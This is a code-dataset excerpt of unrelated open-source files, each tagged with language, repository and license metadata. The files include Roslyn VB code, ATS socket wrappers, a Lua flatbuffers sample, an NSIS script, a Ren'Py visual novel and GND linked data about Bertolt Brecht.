Return AdaptedParameterSymbol.MarshallingInformation
End Get
End Property
Private ReadOnly Property IParameterDefinitionMarshallingDescriptor As ImmutableArray(Of Byte) Implements IParameterDefinition.MarshallingDescriptor
Get
CheckDefinitionInvariant()
Return AdaptedParameterSymbol.MarshallingDescriptor
End Get
End Property
Friend NotOverridable Overrides Sub IReferenceDispatch(visitor As MetadataVisitor) ' Implements IReference.Dispatch
Debug.Assert(Me.IsDefinitionOrDistinct())
If Not AdaptedParameterSymbol.IsDefinition Then
visitor.Visit(DirectCast(Me, IParameterTypeInformation))
Else
If AdaptedParameterSymbol.ContainingModule = (DirectCast(visitor.Context.Module, PEModuleBuilder)).SourceModule Then
visitor.Visit(DirectCast(Me, IParameterDefinition))
Else
visitor.Visit(DirectCast(Me, IParameterTypeInformation))
End If
End If
End Sub
Friend NotOverridable Overrides Function IReferenceAsDefinition(context As EmitContext) As IDefinition ' Implements IReference.AsDefinition
Debug.Assert(Me.IsDefinitionOrDistinct())
Dim moduleBeingBuilt As PEModuleBuilder = DirectCast(context.Module, PEModuleBuilder)
If AdaptedParameterSymbol.IsDefinition AndAlso AdaptedParameterSymbol.ContainingModule = moduleBeingBuilt.SourceModule Then
Return Me
End If
Return Nothing
End Function
Private ReadOnly Property INamedEntityName As String Implements INamedEntity.Name
Get
Return AdaptedParameterSymbol.MetadataName
End Get
End Property
End Class
Partial Friend Class ParameterSymbol
#If DEBUG Then
Private _lazyAdapter As ParameterSymbolAdapter
Protected Overrides Function GetCciAdapterImpl() As SymbolAdapter
Return GetCciAdapter()
End Function
Friend Shadows Function GetCciAdapter() As ParameterSymbolAdapter
If _lazyAdapter Is Nothing Then
Return InterlockedOperations.Initialize(_lazyAdapter, New ParameterSymbolAdapter(Me))
End If
Return _lazyAdapter
End Function
#Else
Friend ReadOnly Property AdaptedParameterSymbol As ParameterSymbol
Get
Return Me
End Get
End Property
Friend Shadows Function GetCciAdapter() As ParameterSymbol
Return Me
End Function
#End If
Friend Overridable ReadOnly Property HasMetadataConstantValue As Boolean
Get
CheckDefinitionInvariant()
If Me.HasExplicitDefaultValue Then
Dim value = Me.ExplicitDefaultConstantValue
Return Not (value.Discriminator = ConstantValueTypeDiscriminator.DateTime OrElse value.Discriminator = ConstantValueTypeDiscriminator.Decimal)
End If
Return False
End Get
End Property
Friend Overridable ReadOnly Property IsMetadataOptional As Boolean
Get
CheckDefinitionInvariant()
Return Me.IsOptional OrElse GetAttributes().Any(Function(a) a.IsTargetAttribute(Me, AttributeDescription.OptionalAttribute))
End Get
End Property
Friend Overridable ReadOnly Property IsMarshalledExplicitly As Boolean
Get
CheckDefinitionInvariant()
Return MarshallingInformation IsNot Nothing
End Get
End Property
Friend Overridable ReadOnly Property MarshallingDescriptor As ImmutableArray(Of Byte)
Get
CheckDefinitionInvariant()
Return Nothing
End Get
End Property
End Class
#If DEBUG Then
Partial Friend NotInheritable Class ParameterSymbolAdapter
Friend ReadOnly Property AdaptedParameterSymbol As ParameterSymbol
Friend Sub New(underlyingParameterSymbol As ParameterSymbol)
AdaptedParameterSymbol = underlyingParameterSymbol
End Sub
Friend Overrides ReadOnly Property AdaptedSymbol As Symbol
Get
Return AdaptedParameterSymbol
End Get
End Property
End Class
#End If
End Namespace
| Visual Basic | 4 | Cadris/roslyn | src/Compilers/VisualBasic/Portable/Emit/ParameterSymbolAdapter.vb | [
"MIT"
] |
create database firstdb;
| SQL | 1 | suryatmodulus/tidb | br/tests/lightning_black-white-list/data/firstdb-schema-create.sql | [
"Apache-2.0",
"BSD-3-Clause"
] |
(***********************************************************************)
(* *)
(* Applied Type System *)
(* *)
(***********************************************************************)
(*
** ATS/Postiats - Unleashing the Potential of Types!
** Copyright (C) 2011-2014 Hongwei Xi, ATS Trustful Software, Inc.
** All rights reserved
**
** ATS is free software; you can redistribute it and/or modify it under
** the terms of the GNU GENERAL PUBLIC LICENSE (GPL) as published by the
** Free Software Foundation; either version 3, or (at your option) any
** later version.
**
** ATS is distributed in the hope that it will be useful, but WITHOUT ANY
** WARRANTY; without even the implied warranty of MERCHANTABILITY or
** FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
** for more details.
**
** You should have received a copy of the GNU General Public License
** along with ATS; see the file COPYING. If not, please write to the
** Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA
** 02110-1301, USA.
*)
(* ****** ****** *)
//
// Author: Hongwei Xi
// Authoremail: gmhwxiATgmailDOTcom
// Start Time: November, 2014
//
(* ****** ****** *)
%{#
#include "libc/sys/CATS/socket.cats"
%} // end of [%{#]
(* ****** ****** *)
#define ATS_PACKNAME "ATSLIB.libc"
#define ATS_DYNLOADFLAG 0 // no need for staloading at run-time
#define ATS_EXTERN_PREFIX "atslib_" // prefix for external names
(* ****** ****** *)
staload "libc/sys/SATS/socket.sats"
(* ****** ****** *)
staload UN = "prelude/SATS/unsafe.sats"
(* ****** ****** *)
%{
ATSextern()
atstype_int
atslib_socket_AF_type_exn
(
sa_family_t af, atstype_int tp
) {
int
fildes;
fildes = socket(af, tp, 0);
if(0 > fildes) ATSLIBfailexit("socket") ; // HX: failure
return fildes;
} // end of [atslib_socket_AF_type_exn]
%} // end of [%{]
(* ****** ****** *)
%{
ATSextern()
atsvoid_t0ype
atslib_bind_exn
(
atstype_int fd
, atstype_ptr addr, socklen_t addrlen
) {
int
err;
err = bind(fd, addr, addrlen);
if(0 > err) ATSLIBfailexit("bind") ; // HX: failure
return;
} // end of [atslib_bind_exn]
%} // end of [%{]
(* ****** ****** *)
%{
ATSextern()
atsvoid_t0ype
atslib_listen_exn
(
atstype_int fd, atstype_int nq
) {
int
err;
err = listen(fd, nq);
if(0 > err) ATSLIBfailexit("listen") ; // HX: failure
return;
} // end of [atslib_listen_exn]
%} // end of [%{]
(* ****** ****** *)
%{
ATSextern()
atsvoid_t0ype
atslib_connect_exn
(
atstype_int fd
, atstype_ptr addr, socklen_t addrlen
) {
int
err;
err = connect(fd, addr, addrlen);
if(0 > err) ATSLIBfailexit("connect") ; // HX: failure
return;
} // end of [atslib_connect_exn]
%} // end of [%{]
(* ****** ****** *)
%{
ATSextern()
atsvoid_t0ype
atslib_socket_close_exn
(
atstype_int fd
) {
int
err;
err = close(fd);
if(0 > err) ATSLIBfailexit("socket_close") ; // HX: failure
return;
} // end of [atslib_socket_close_exn]
%} // end of [%{]
(* ****** ****** *)
%{
ATSextern()
atsvoid_t0ype
atslib_shutdown_exn
(
atstype_int fd, atstype_int how
) {
int
err;
err = shutdown(fd, how);
if(0 > err) ATSLIBfailexit("shutdown") ; // HX: failure
return;
} // end of [atslib_shutdown_exn]
%} // end of [%{]
(* ****** ****** *)
(* end of [socket.dats] *)
| ATS | 5 | bbarker/ATS-Postiats-contrib | projects/LARGE/TUTORIATS/in-browsers/PATSHOME/libats/libc/sys/DATS/socket.dats | [
"MIT"
] |
hello = Bonjour!
bye = Au revoir!
| FreeMarker | 0 | csh/amethyst | examples/locale/assets/locale/locale_fr.ftl | [
"MIT"
] |
"""
datetime specialization of AdjustedArrayWindow
"""
from numpy cimport int64_t
ctypedef int64_t[:, :] databuffer
include "_windowtemplate.pxi"
| Cython | 1 | leonarduschen/zipline | zipline/lib/_int64window.pyx | [
"Apache-2.0"
] |
alias fl="flutter"
alias flattach="flutter attach"
alias flb="flutter build"
alias flchnl="flutter channel"
alias flc="flutter clean"
alias fldvcs="flutter devices"
alias fldoc="flutter doctor"
alias flpub="flutter pub"
alias flget="flutter pub get"
alias flr="flutter run"
alias flrd="flutter run --debug"
alias flrp="flutter run --profile"
alias flrr="flutter run --release"
alias flupgrd="flutter upgrade"
| Shell | 3 | residwi/ohmyzsh | plugins/flutter/flutter.plugin.zsh | [
"MIT"
] |
module monadicSemantics
import StdEnv, StdGeneric, GenMap, GenHylo
/* For fun I implemented the recursive datastructre Exp and Stm as fixpoints
This helps us define recursive functions on them (only a little bit though)
However deriving gMap for Fix did not works out of the box
I had to remove some uniqueness typing in GenMap and GenHylo */
:: Op = Plus | Minus | Times | Rem | Equal | LessThan
:: Var :== String
:: ExpP a = Int Int | Var Var | Op Op a a
:: Exp :== Fix ExpP
:: StmP a = Assign Var Exp | If Exp a a | While Exp a | Seq a a | Cont
:: Stm :== Fix StmP
derive gMap ExpP, StmP, Fix
// Environment. Semantics is basically Env -> Env
:: Env :== Var -> Int
:: Sem :== Env -> (Int, Env)
empty = \v . 0
// return
rtn :: Int -> Sem
rtn i = \e. (i, e)
// the usual bind
(>>=) infixl 1 :: Sem (Int->Sem) -> Sem
(>>=) x y = \e. (\(i,e2).y i e2) (x e)
(>>|) infixl 1 :: Sem Sem -> Sem
(>>|) x y = x >>= \_. y
// read variable from environment
read :: Var -> Sem
read v = \e. (e v, e)
// assign value to give variable in environment
write :: Var Int -> Sem
write v i = \e. (i, \w. if (w==v) i (e w))
// semantics
class sem a :: a -> Sem
operator :: Op -> Int -> Int -> Int
operator Plus = (+)
operator Minus = (-)
operator Times = (*)
operator Rem = rem
operator Equal = \x y . if (x==y) 1 0
operator LessThan = \x y . if (x< y) 1 0
// semantics of expressions
instance sem Exp where
sem x = cata phi x where
phi (Int n) = rtn n
phi (Var v) = read v
phi (Op op x y) = x >>= \v1. y >>= return o (operator op v1)
// semantics of statments
// NOTE: while will always return 0, as it might not even be executed
instance sem Stm where
sem x = cata phi x where
phi (Assign v e) = sem e >>= write v
phi (If e s1 s2) = sem e >>= \b . if (b<>0) s1 s2
phi stm=:(While e s) = sem e >>= \b . if (b<>0) (s >>| phi stm) (phi Cont)
phi (Seq s1 s2) = s1 >>| s2 // Here the cata *finally* pays off :D
phi Cont = rtn 0
// convenience functions
int = In o Int
var = In o Var
op o = In o2 (Op o)
assign = In o2 Assign
ifte e = In o2 (If e)
while = In o2 While
seq = In o2 Seq
cont = In Cont
// test case, also testing the new operator <
pEuclides =
while (op LessThan (int 0) (var "b"))(
seq (assign "r" (op Rem (var "a") (var "b")))
(seq (assign "a" (var "b"))
( (assign "b" (var "r")))
)
)
Start = fst (program start) where
program = sem pEuclides >>| read "a"
start "a" = 9
start "b" = 12
start _ = 0
// Helper
(o2) infixr 9
(o2) f g x :== f o (g x)
| Clean | 5 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Clean/sem.icl | [
"MIT"
] |
POM_NAME=Glide OkHttp Integration
POM_ARTIFACT_ID=okhttp-integration
POM_PACKAGING=aar
POM_DESCRIPTION=An integration library to use OkHttp 2.x to fetch data over http/https in Glide
| INI | 2 | jhavstadxumo/glide | integration/okhttp/gradle.properties | [
"Apache-2.0"
] |
-- need to update the Lua path to point to the local flatbuffers implementation
package.path = string.format("../lua/?.lua;%s",package.path)
package.path = string.format("./lua/?.lua;%s",package.path)
-- require the library
local flatbuffers = require("flatbuffers")
local binaryArray = flatbuffers.binaryArray-- for hex dump utility
-- require the files generated from the schema
local weapon = require("MyGame.Sample.Weapon")
local monster = require("MyGame.Sample.Monster")
local vec3 = require("MyGame.Sample.Vec3")
local color = require("MyGame.Sample.Color")
local equipment = require("MyGame.Sample.Equipment")
-- get access to the builder, providing an array of size 1024
local builder = flatbuffers.Builder(1024)
local weaponOne = builder:CreateString("Sword")
local weaponTwo = builder:CreateString("Axe")
-- Create the first 'Weapon'
weapon.Start(builder)
weapon.AddName(builder, weaponOne)
weapon.AddDamage(builder, 3)
local sword = weapon.End(builder)
-- Create the second 'Weapon'
weapon.Start(builder)
weapon.AddName(builder, weaponTwo)
weapon.AddDamage(builder, 5)
local axe = weapon.End(builder)
-- Serialize a name for our mosnter, called 'orc'
local name = builder:CreateString("Orc")
-- Create a `vector` representing the inventory of the Orc. Each number
-- could correspond to an item that can be claimed after he is slain.
-- Note: Since we prepend the bytes, this loop iterates in reverse.
monster.StartInventoryVector(builder, 10)
for i=10,1,-1 do
builder:PrependByte(i)
end
local inv = builder:EndVector(10)
-- Create a FlatBuffer vector and prepend the weapons.
-- Note: Since we prepend the data, prepend them in reverse order.
monster.StartWeaponsVector(builder, 2)
builder:PrependUOffsetTRelative(axe)
builder:PrependUOffsetTRelative(sword)
local weapons = builder:EndVector(2)
-- Create our monster by using Start() andEnd()
monster.Start(builder)
monster.AddPos(builder, vec3.CreateVec3(builder, 1.0, 2.0, 3.0))
monster.AddHp(builder, 300)
monster.AddName(builder, name)
monster.AddInventory(builder, inv)
monster.AddColor(builder, color.Red)
monster.AddWeapons(builder, weapons)
monster.AddEquippedType(builder, equipment.Weapon)
monster.AddEquipped(builder, axe)
local orc = monster.End(builder)
-- Call 'Finish()' to instruct the builder that this monster is complete.
builder:Finish(orc)
-- Get the flatbuffer as a string containing the binary data
local bufAsString = builder:Output()
-- Convert the string representation into binary array Lua structure
local buf = flatbuffers.binaryArray.New(bufAsString)
-- Get an accessor to the root object insert the buffer
local mon = monster.GetRootAsMonster(buf, 0)
assert(mon:Mana() == 150)
assert(mon:Hp() == 300)
assert(mon:Name() == "Orc")
assert(mon:Color() == color.Red)
assert(mon:Pos():X() == 1.0)
assert(mon:Pos():Y() == 2.0)
assert(mon:Pos():Z() == 3.0)
for i=1,mon:InventoryLength() do
assert(mon:Inventory(i) == i)
end
local expected = {
{w = 'Sword', d = 3},
{w = 'Axe', d = 5}
}
for i=1,mon:WeaponsLength() do
assert(mon:Weapons(i):Name() == expected[i].w)
assert(mon:Weapons(i):Damage() == expected[i].d)
end
assert(mon:EquippedType() == equipment.Weapon)
local unionWeapon = weapon.New()
unionWeapon:Init(mon:Equipped().bytes,mon:Equipped().pos)
assert(unionWeapon:Name() == "Axe")
assert(unionWeapon:Damage() == 5)
print("The Lua FlatBuffer example was successfully created and verified!") | Lua | 5 | chi-w-ng/flatbuffers | samples/sample_binary.lua | [
"Apache-2.0"
] |
<div class="panel hidden" id="panel-docfile" name="Document">
<button class="white disabled-in-offline-mode disabled-for-reserved" onclick="prepareRenameModal(activeDocID);">
<i class="ri-file-edit-fill"></i>
<span>rename</span>
</button>
<button class="white disabled-in-offline-mode disabled-while-saving" onclick="openSidebarMenu(); prepareMoveFloater('activeDoc');">
<i class="ri-folder-shared-fill"></i>
<span>move to</span>
</button>
<button class="white disabled-for-reserved disabled-while-saving" onclick="showCopyDocPanel(activeDocID);" id="copyActiveDocButton">
<i class="ri-file-copy-2-fill"></i>
<span>make a copy</span>
</button>
<button class="white" onclick="togglePanel('export-doc');">
<i class="ri-file-download-fill"></i>
<span>export / print</span>
</button>
<button class="white disabled-in-offline-mode hide-for-offline-folder-or-doc" onclick="makeDocumentAvailableOffline(activeDocID);" id="makeActiveDocOfflineButton">
<i class="ri-download-cloud-fill"></i>
<span>make available offline</span>
</button>
<button class="red show-for-offline-folder-or-doc disabled-while-saving" onclick="prepareMakeOnlineModal('activeDoc');" id="makeActiveDocOnlineButton">
<i class="ri-delete-bin-4-fill"></i>
<span>remove from offline storage</span>
</button>
<hr>
<button class="red delete disabled-in-offline-mode disabled-while-saving" onclick="prepareDeleteDocsModal('activeDoc');">
<i class="ri-delete-bin-fill"></i>
<span>delete</span>
</button>
</div> | Kit | 3 | pws1453/web-client | source/imports/app/docs-panel-docfile.kit | [
"MIT"
] |
Function AdvReplaceInFile
Exch $0 ;file to replace in
Exch
Exch $1 ;number to replace after
Exch
Exch 2
Exch $2 ;replace and onwards
Exch 2
Exch 3
Exch $3 ;replace with
Exch 3
Exch 4
Exch $4 ;to replace
Exch 4
Push $5 ;minus count
Push $6 ;universal
Push $7 ;end string
Push $8 ;left string
Push $9 ;right string
Push $R0 ;file1
Push $R1 ;file2
Push $R2 ;read
Push $R3 ;universal
Push $R4 ;count (onwards)
Push $R5 ;count (after)
Push $R6 ;temp file name
GetTempFileName $R6
FileOpen $R1 $0 r ;file to search in
FileOpen $R0 $R6 w ;temp file
StrLen $R3 $4
StrCpy $R4 -1
StrCpy $R5 -1
loop_read:
ClearErrors
FileRead $R1 $R2 ;read line
IfErrors exit
StrCpy $5 0
StrCpy $7 $R2
loop_filter:
IntOp $5 $5 - 1
StrCpy $6 $7 $R3 $5 ;search
StrCmp $6 "" file_write1
StrCmp $6 $4 0 loop_filter
StrCpy $8 $7 $5 ;left part
IntOp $6 $5 + $R3
IntCmp $6 0 is0 not0
is0:
StrCpy $9 ""
Goto done
not0:
StrCpy $9 $7 "" $6 ;right part
done:
StrCpy $7 $8$3$9 ;re-join
IntOp $R4 $R4 + 1
StrCmp $2 all loop_filter
StrCmp $R4 $2 0 file_write2
IntOp $R4 $R4 - 1
IntOp $R5 $R5 + 1
StrCmp $1 all loop_filter
StrCmp $R5 $1 0 file_write1
IntOp $R5 $R5 - 1
Goto file_write2
file_write1:
FileWrite $R0 $7 ;write modified line
Goto loop_read
file_write2:
FileWrite $R0 $R2 ;write unmodified line
Goto loop_read
exit:
FileClose $R0
FileClose $R1
SetDetailsPrint none
Delete $0
Rename $R6 $0
Delete $R6
SetDetailsPrint both
Pop $R6
Pop $R5
Pop $R4
Pop $R3
Pop $R2
Pop $R1
Pop $R0
Pop $9
Pop $8
Pop $7
Pop $6
Pop $5
Pop $0
Pop $1
Pop $2
Pop $3
Pop $4
FunctionEnd
| NSIS | 3 | jaccarmac/livestreamer | win32/AdvReplaceInFile.nsh | [
"BSD-2-Clause",
"MIT"
] |
namespace java com.twitter.delivery.thriftjava
#@namespace scala com.twitter.delivery.thriftscala
exception AException {
1: i32 errorCode
}
service DeliveryService {
Box getBox(1: AddrInfo addrInfo, 3: i8 passcode) throws (
1: AException ex
)
list<Box> getBoxes(1: list<AddrInfo> listAddrInfo, 3: i8 passcode) throws (
1: AException ex
)
string sendBox(1: Box box)
string sendBoxes(1: list<Box> boxes)
}
struct Box {
1: AddrInfo addrInfo;
2: string item;
}
struct AddrInfo {
1: string name;
2: i32 zipCode;
}
| Thrift | 4 | peter-janssen/finagle | finagle-thrift/src/test/thrift/delivery_service.thrift | [
"Apache-2.0"
] |
LG-KM555/V100 Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
| Text | 0 | 5tr1x/SecLists | Fuzzing/User-Agents/operating-platform/lg-km555.txt | [
"MIT"
] |
Prefix(:=<http://example.org/>)
Ontology(:TestExistentialClassAssertion
Declaration(ObjectProperty(:p))
ClassAssertion( ObjectSomeValuesFrom(:p :c) :i)
)
| Web Ontology Language | 3 | jmcmurry/SciGraph | SciGraph-core/src/test/resources/ontologies/cases/TestExistentialClassAssertion.owl | [
"Apache-2.0"
] |
FROM python:3.8
RUN pip install simplejson requests click
RUN pip install numpy
LABEL version="0.1.0" | NumPy | 3 | laboratorybox/hither2 | hither2/examples/example_functions/docker/Dockerfile.numpy | [
"Apache-2.0"
] |
image bg lecturehall = "lecturehall.jpg"
image bg uni = "uni.jpg"
image bg meadow = "meadow.jpg"
image bg club = "club.jpg"
image sylvie normal = "sylvie_normal.png"
image sylvie giggle = "sylvie_giggle.png"
image sylvie smile = "sylvie_smile.png"
image sylvie surprised = "sylvie_surprised.png"
image sylvie2 normal = "sylvie2_normal.png"
image sylvie2 giggle = "sylvie2_giggle.png"
image sylvie2 smile = "sylvie2_smile.png"
image sylvie2 surprised = "sylvie2_surprised.png"
define s = Character('Sylvie', color="#c8ffc8")
define m = Character('Me', color="#c8c8ff")
label start:
$ bl_game = False
play music "illurock.ogg"
scene bg lecturehall
with fade
"Well, professor Eileen's lecture was interesting."
"But to be honest, I couldn't concentrate on it very much."
"I had a lot of other thoughts on my mind."
"And they all ended up with a question."
"A question, I've been meaning to ask someone."
scene bg uni
with fade
"When we came out of the university, I saw her."
show sylvie normal
with dissolve
"She was a wonderful person."
"I've known her ever since we were children."
"And she's always been a good friend."
"But..."
"Recently..."
"I think..."
"... that I wanted more."
"More just talking... more than just walking home together when our classes ended."
"And I decided..."
menu:
"... to ask her right away.":
jump rightaway
"... to ask her later.":
jump later
label rightaway:
show sylvie smile
s "Oh, hi, do we walk home together?"
m "Yes..."
"I said and my voice was already shaking."
scene bg meadow
with fade
"We reached the meadows just outside our hometown."
"Autumn was so beautiful here."
"When we were children, we often played here."
m "Hey... ummm..."
show sylvie smile
with dissolve
"She turned to me and smiled."
"I'll ask her..."
m "Ummm... will you..."
m "Will you be my artist for a visual novel?"
show sylvie surprised
"Silence."
"She is shocked. And then..."
show sylvie smile
s "Sure, but what is a \"visual novel?\""
menu:
"It's a story with pictures.":
jump vn
"It's a hentai game.":
jump hentai
label vn:
m "It's a story with pictures and music."
m "And you'll be able to make choices that influence the outcome of the story."
s "So it's like those choose-your-adventure books?"
m "Exactly! I plan on making a small romantic story."
m "And I figured you could help me... since I know how you like to draw."
show sylvie normal
s "Well, I can try. I hope I don't disappoint you."
m "You can't disappoint me, you know that."
jump marry
label hentai:
$ bl_game = True
m "Why it's a game with lots of sex."
s "You mean, like a boy's love game?"
s "I've always wanted to make one of those."
s "I'll get right on it!"
hide sylvie
with dissolve
"..."
m "That wasn't what I meant!"
jump marry
label marry:
scene black
with dissolve
"--- years later ---"
scene bg club
with dissolve
"And so, we became a visual novel creating team."
"We made games and had a lot of fun making them."
if bl_game:
"Well, apart from that Boy's Love game she insisted on making."
"And one day..."
show sylvie2 normal
with dissolve
s "Hey..."
m "Yes?"
show sylvie2 giggle
s "Marry me!"
m "What???"
show sylvie2 surprised
s "Well, don't you love me?"
m "I do, actually."
show sylvie2 smile
s "See? We've been making romantic visual novels, spending time together, helping each other...."
s "... and when you give love to others, love will come to you."
m "Hmmm, that's a nice thought."
show sylvie2 giggle
s "I just made that up."
m "But it's good."
show sylvie2 normal
s "I know. So, will you marry me?"
m "Ummm, of course I will. I've actually been meaning to ask you, but since you brought it up..."
s "I know, but you are so indecisive, that I thought I'd take the initiative. "
m "I guess... It's all about asking the right question... at the right time."
show sylvie2 giggle
s "It is. But now, stop being theoretical, and give me a kiss!"
scene black
with dissolve
"And we got married shortly after that."
"In fact, we made many more visual novels."
"And together, we lived happily ever after."
".:. Good Ending."
return
label later:
scene black
with dissolve
"And so I decided to ask her later."
"But I was indecisive."
"I couldn't ask her that day, and I couldn't ask her later."
"I guess I will never know now."
".:. Bad Ending."
return
# Decompiled by unrpyc: https://github.com/CensoredUsername/unrpyc
| Ren'Py | 3 | Gouvernathor/unrpyc | testcases/script.orig.rpy | [
"MIT"
] |
--TEST--
Zend: Test compile string
--EXTENSIONS--
zend_test
--FILE--
<?php
define('ZEND_COMPILE_POSITION_AT_SHEBANG', 0);
define('ZEND_COMPILE_POSITION_AT_OPEN_TAG', 1);
define('ZEND_COMPILE_POSITION_AFTER_OPEN_TAG', 2);
$source_string = <<<EOF
#!/path/to/php
<?php
var_dump('php');
EOF;
zend_test_compile_string($source_string, 'Source string', ZEND_COMPILE_POSITION_AT_SHEBANG);
$source_string = <<<EOF
#!/path/to/php
<?php
var_dump('php');
EOF;
zend_test_compile_string($source_string, 'Source string', ZEND_COMPILE_POSITION_AT_OPEN_TAG);
$source_string = <<<EOF
<?php
var_dump('php');
EOF;
zend_test_compile_string($source_string, 'Source string', ZEND_COMPILE_POSITION_AT_OPEN_TAG);
$source_string = <<<EOF
var_dump('php');
EOF;
zend_test_compile_string($source_string, 'Source string', ZEND_COMPILE_POSITION_AFTER_OPEN_TAG);
$source_string = <<<EOF
<?php
var_dump('php');
EOF;
zend_test_compile_string($source_string, 'Source string', ZEND_COMPILE_POSITION_AFTER_OPEN_TAG);
?>
--EXPECT--
string(3) "php"
#!/path/to/php
string(3) "php"
string(3) "php"
string(3) "php"
Parse error: syntax error, unexpected token "<", expecting end of file in Source string on line 1
| PHP | 3 | NathanFreeman/php-src | ext/zend_test/tests/zend_test_compile_string.phpt | [
"PHP-3.01"
] |
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix gndo: <http://d-nb.info/standards/elementset/gnd#> .
@prefix xsd: <http://www.w3.org/2001/XMLSchema#> .
<http://d-nb.info/gnd/118514768>
a <http://d-nb.info/standards/elementset/gnd#Pseudonym> ;
foaf:page <http://de.wikipedia.org/wiki/Bertolt_Brecht> ;
owl:sameAs <http://dbpedia.org/resource/Bertolt_Brecht>, <http://viaf.org/viaf/2467372>, <http://www.filmportal.de/person/261E2D3A93D54134BF8AB5F21F0B2399> ;
gndo:gndIdentifier "118514768" ;
gndo:oldAuthorityNumber "(DE-588)1022091077", "(DE-588a)118514768", "(DE-588a)141399074", "(DE-588a)139089691", "(DE-588a)141300248", "(DE-588a)136949541", "(DE-588a)134336232", "(DE-588a)12794544X", "(DE-588a)12736630X", "(DE-588a)12722811X", "(DE-588a)127228098", "(DE-588a)127228101" ;
gndo:variantNameForThePerson "Brêcht, Becton", "Brecht, Bert", "Brecht, Bertolʹ", "Brecht, Berthold", "Brecht, Bertholt", "Brecht, Bertold", "Brecht, B.", "Brecht, Eugen Berthold Friedrich", "Brecht, ...", "Brecht-Eisler, ...", "Becht, Bertolt", "Beituo'erte-Bulaixite", "Berchito, B.", "Brechtas, B.", "Brechts, Bertolts", "Brehd, Berd", "Breht, Bertolt", "Brehts, Bertolts", "Breḳhṭ, Bārṭolṭ", "Brekt, Berṭolṭ", "Brekṭ, Berṭōlṭ", "Breḳṭ, Berṭôlṭ", "Breśṭ, Berṭalṭa", "Breṣṭa, Barṭolṭa", "Brišt, Bartūlt", "Brišt, Birtūld", "Brišt, Birtult", "Buchito, Berutorutu", "Bulaixite, Beituo'erte", "Bulaixite, ...", "Burehito, Berutoruto", "Burehito, ...", "B. B.", "Larsen, Berthold", "Mprecht, Mpertolt", "Mprecht, ...", "Pulaihsit'ê, Peit'oĉrht'ê", "Pulaihsit'ê, ...", "Pŭrehit'ŭ, Peŏt'olt'ŭ", "Bŭrehit'ŭ, Beŏt'olt'ŭ", "برشت، برتولد", "브레히트, 베르톨트", "ברכט, ברטולט", "贝·布莱希特", "布莱希特, 贝", "ブレヒト, ベルトルト" ;
gndo:variantNameEntityForThePerson [
gndo:forename "Becton" ;
gndo:surname "Brêcht"
], [
gndo:forename "Bert" ;
gndo:surname "Brecht"
], [
gndo:forename "Bertolʹ" ;
gndo:surname "Brecht"
], [
gndo:forename "Berthold" ;
gndo:surname "Brecht"
], [
gndo:forename "Bertholt" ;
gndo:surname "Brecht"
], [
gndo:forename "Bertold" ;
gndo:surname "Brecht"
], [
gndo:forename "B." ;
gndo:surname "Brecht"
], [
gndo:forename "Eugen Berthold Friedrich" ;
gndo:surname "Brecht"
], [
gndo:forename "..." ;
gndo:surname "Brecht"
], [
gndo:forename "..." ;
gndo:surname "Brecht-Eisler"
], [
gndo:forename "Bertolt" ;
gndo:surname "Becht"
], [ gndo:personalName "Beituo'erte-Bulaixite" ], [
gndo:forename "B." ;
gndo:surname "Berchito"
], [
gndo:forename "B." ;
gndo:surname "Brechtas"
], [
gndo:forename "Bertolts" ;
gndo:surname "Brechts"
], [
gndo:forename "Berd" ;
gndo:surname "Brehd"
], [
gndo:forename "Bertolt" ;
gndo:surname "Breht"
], [
gndo:forename "Bertolts" ;
gndo:surname "Brehts"
], [
gndo:forename "Bārṭolṭ" ;
gndo:surname "Breḳhṭ"
], [
gndo:forename "Berṭolṭ" ;
gndo:surname "Brekt"
], [
gndo:forename "Berṭōlṭ" ;
gndo:surname "Brekṭ"
], [
gndo:forename "Berṭôlṭ" ;
gndo:surname "Breḳṭ"
], [
gndo:forename "Berṭalṭa" ;
gndo:surname "Breśṭ"
], [
gndo:forename "Barṭolṭa" ;
gndo:surname "Breṣṭa"
], [
gndo:forename "Bartūlt" ;
gndo:surname "Brišt"
], [
gndo:forename "Birtūld" ;
gndo:surname "Brišt"
], [
gndo:forename "Birtult" ;
gndo:surname "Brišt"
], [
gndo:forename "Berutorutu" ;
gndo:surname "Buchito"
], [
gndo:forename "Beituo'erte" ;
gndo:surname "Bulaixite"
], [
gndo:forename "..." ;
gndo:surname "Bulaixite"
], [
gndo:forename "Berutoruto" ;
gndo:surname "Burehito"
], [
gndo:forename "..." ;
gndo:surname "Burehito"
], [ gndo:personalName "B. B." ], [
gndo:forename "Berthold" ;
gndo:surname "Larsen"
], [
gndo:forename "Mpertolt" ;
gndo:surname "Mprecht"
], [
gndo:forename "..." ;
gndo:surname "Mprecht"
], [
gndo:forename "Peit'oĉrht'ê" ;
gndo:surname "Pulaihsit'ê"
], [
gndo:forename "..." ;
gndo:surname "Pulaihsit'ê"
], [
gndo:forename "Peŏt'olt'ŭ" ;
gndo:surname "Pŭrehit'ŭ"
], [
gndo:forename "Beŏt'olt'ŭ" ;
gndo:surname "Bŭrehit'ŭ"
], [ gndo:personalName "برشت، برتولد" ], [
gndo:forename "베르톨트" ;
gndo:surname "브레히트"
], [
gndo:forename "ברטולט" ;
gndo:surname "ברכט"
], [ gndo:personalName "贝·布莱希特" ], [
gndo:forename "贝" ;
gndo:surname "布莱希特"
], [
gndo:forename "ベルトルト" ;
gndo:surname "ブレヒト"
] ;
gndo:preferredNameForThePerson "Brecht, Bertolt" ;
gndo:preferredNameEntityForThePerson [
gndo:forename "Bertolt" ;
gndo:surname "Brecht"
] ;
gndo:familialRelationship <http://d-nb.info/gnd/121608557>, <http://d-nb.info/gnd/119056011>, <http://d-nb.info/gnd/118738348>, <http://d-nb.info/gnd/137070411>, <http://d-nb.info/gnd/118809849>, <http://d-nb.info/gnd/119027615>, <http://d-nb.info/gnd/118940163>, <http://d-nb.info/gnd/118630091>, <http://d-nb.info/gnd/123783283>, <http://d-nb.info/gnd/118940155>, <http://d-nb.info/gnd/110005449>, <http://d-nb.info/gnd/13612495X>, <http://d-nb.info/gnd/123757398>, <http://d-nb.info/gnd/1030496250>, <http://d-nb.info/gnd/1030496366> ;
